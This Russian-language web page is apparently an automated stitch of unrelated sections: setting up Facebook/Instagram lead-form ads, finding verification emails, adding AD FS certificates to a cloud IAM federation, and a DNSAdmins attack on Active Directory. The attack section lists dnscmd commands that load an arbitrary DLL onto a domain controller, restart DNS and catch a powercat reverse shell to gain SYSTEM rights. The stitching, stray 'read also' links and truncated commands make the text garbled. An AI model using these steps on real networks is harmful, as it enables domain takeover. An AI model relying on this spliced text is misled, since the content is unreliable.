Как создать рекламу с лид-формой для Facebook и Instagram

Разберемся, как настроить и запустить рекламу с лид-формой в Facebook и Instagram.

Запуск рекламного объявления с лид-формой в Instagram и Facebook

Instagram — это часть Facebook, поэтому реклама для обеих платформ запускается из Ads Manager или из раздела Центр рекламы бизнес-страницы Facebook.

При этом, даже если у вас нет своего аккаунта в Instagram, вы всё равно можете публиковать там рекламу. Для этого достаточно иметь бизнес-страницу Facebook, от имени которой будет размещаться реклама в Instagram.

Создать рекламное объявление с лид-формой можно двумя способами:

1. У бизнес-страницы Facebook есть раздел Центр рекламы. У этого инструмента упрощёный интерфейс и урезанная функциональность:

Запуск рекламного объявления с лид-формой в Instagram и Facebook
  • возможности настройки аудитории и бюджета очень ограничены;
  • рекламное объявление будет показано сразу и в Facebook, и в Instagram (выбрать что-то одно вы не сможете);
  • у пользователей можно запросить очень мало данных.

Мало кто из SMM-щиков пользуется этим способом.

Данные, которые можно запросить у лидов через бизнес-страницу Facebook, сильно ограничены

2. Ads Manager — рекламный кабинет, из которого запускается реклама на Facebook и Instagram. Здесь больше возможностей настройки рекламного объявления и анализа кампании — реклама будет эффективнее. Далее мы будем настраивать рекламную кампанию в Ads Manager.

DNSAdmins

Microsoft не только реализовала собственный DNS-сервер, но и внедрила для него протокол управления, позволяющий интегрировать DNS-сервер с доменами Active Directory. По умолчанию контроллеры домена также являются DNS-серверами, поэтому DNS-серверы должны быть доступны каждому пользователю домена. Это, в свою очередь, открывает потенциальную возможность для атаки на контроллеры домена: с одной стороны мы имеем сам протокол DNS, а с другой — протокол управления, основанный на RPC.

Читайте также:  Как установить шрифты в Windows 7: два способа с пошаговой инструкцией

Пользователь, входящий в группу DNSAdmins или имеющий права на запись в объекты DNS-сервера, может загрузить на DNS-сервер произвольную DLL с привилегиями System. Это очень опасно, поскольку многие корпоративные сети используют контроллер домена в качестве DNS-сервера.

Таким образом, для реализации атаки мы можем просто загрузить на DNS-сервер произвольную библиотеку с помощью dnscmd (путь \\ops-build\dll должен быть доступен для чтения DC):

PS C:\> dnscmd ops_dc/config/serverlevelplugindll \\ops-build\dll\

Чтобы проверить, была ли загружена DLL, можно использовать следующую команду:

PS C:\> Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll

Так как наш пользователь — член группы DNSAdmins, мы можем перезапустить службу DNS:

C:\> sc \\ops-dc stop dns C:\> sc \\ops-dc start dns

DNSAdmins

После перезапуска DNS-сервера будет выполнен код из загруженной библиотеки. Такая библиотека, например, может содержать скрипт PowerShell для обратного подключения.

Пример PowerShell-кода в DLL

После успешного выполнения скрипта мы будем прослушивать на своем хосте обратное подключение:

PS C:\> powercat -l -v -p 443 -t 1000

Пример успешного бэкконнекта

В результате мы получим права system на DC.

Поиск в папке «Входящие» электронной почты писем с сообщением о верификации

Два предыдущих метода касаются простых вариантов аутентификации. Теперь мы займемся более тщательной проверкой. Для этого надо будет войти в свою электронную почту и найти там письма с подтверждением регистрации. Понадобится осуществить поиск по стандартным словам в заголовке, ведь сервисы при регистрации отправляют письма со схожими шаблонами.

Кроме того, в Gmail вы можете использовать операторы поиска и ключевые слова для фильтрации определенных тем. Например, при вводе в окно поиска фразы subject: verify отобразятся все письма, в теме которых встречается слово verify. Это позволит обнаружить практически все регистрации и приложения, связанные с вашим адресом электронной почты.

Читайте также:  Как создать загрузочную флешку с Windows 7

Автоматизировать эту задачу можно с помощью такого онлайн-инструмента, как EmailExport. Этот сайт будет анализировать ваши электронные письма с помощью мощных фильтров, а потом систематизирует результаты в электронной таблице. И хотя эта услуга бесплатной не является, она поможет сэкономить много времени. Но и тут стоит проявить бдительность. Сторонний сервис получит разрешение на чтение вашей папки «Входящие», что приведет к риску утечки личных данных. EmailExport бесплатно работает с первой сотней сообщений, а при превышении этого числа придется заплатить около 5 долларов за каждые последующие обработанные 250 писем.

Поиск в папке «Входящие» электронной почты писем с сообщением о верификации

ПО ТЕМЕ: Как передать гостям пароль от Wi-Fi, при этом не называя его (QR-код).

Укажите сертификаты для федерации

Когда поставщик удостоверений (IdP) сообщает , что пользователь прошел аутентификацию, он подписывает сообщение своим сертификатом. Чтобы могло проверить этот сертификат, добавьте его в созданную федерацию в IAM.

Совет

Чтобы аутентификация не прерывалась в тот момент, когда у очередного сертификата закончился срок действия, рекомендуется добавлять в федерацию несколько сертификатов — текущий и те, которые будут использоваться после текущего. Если один сертификат окажется недействительным, попробует проверить подпись другим сертификатом.

Чтобы получить сертификат службы AD FS:

  1. Войдите на ваш сервер AD FS и откройте Server Manager.
  2. Откройте консоль управления AD FS: ToolsAD FS Management.
  3. В открывшемся окне в дереве слева нажмите ServicesCertificates.
  4. Нажмите правой кнопкой мыши на сертификате в блоке Token-signing и выберите View certificate.
  5. В открывшемся окне перейдите на вкладку Details.
  6. Нажмите кнопку Copy to file.
  7. Нажмите кнопку Next.
  8. Выберите формат Base-64 encoded (.CER) и нажмите Next.
  9. Укажите, куда сохранить сертификат и с каким именем, и нажмите Next.
  10. Проверьте настройки экспорта сертификата и нажмите Finish.
Читайте также:  Избавляемся от синего экрана Memory Management в Windows 10, 8, 7

Консоль управления CLI API

Чтобы добавить сертификат в федерацию:

  1. Откройте страницу каталога в консоли управления.
  2. В меню слева выберите вкладку Федерации.
  3. Нажмите на имя федерации, которой вы хотите добавить сертификат.
  4. Нажмите на кнопку Добавить сертификат внизу страницы.
  5. Выберите способ добавления сертификата:
    • Чтобы добавить сертификат в виде файла, нажмите Выбрать файл и укажите путь к нему.
    • Чтобы вставить скопированное содержимое сертификата, выберите способ Текст и вставьте содержимое.

Если у вас еще нет интерфейса командной строки , установите и инициализируйте его.

По умолчанию используется каталог, указанный в профиле CLI. Вы можете указать другой каталог с помощью параметра —folder-name или —folder-id.

  1. Посмотрите описание команды добавления сертификата:

    $ yc iam certificate create —help

  2. Добавьте сертификат для федерации, указав путь к файлу сертификата:

    $ yc iam certificate create —federation-name my-federation \ —name "my-certificate" \ —certificate-file

Чтобы добавить сертификат, воспользуйтесь методом create для ресурса Certificate:

  1. Сформируйте тело запроса, указав содержимое сертификата в свойстве data:

    { "federationId": "<ID федерации>", "name": "my-certificate", "data": "MII…==" }

  2. Отправьте запрос на добавление сертификата:

    $ export IAM_TOKEN=CggaATEVAgA… $ curl -X POST \ -H "Content-Type: application/json" \ -H "Authorization: Bearer ${IAM_TOKEN}" \ -d '@' \ ""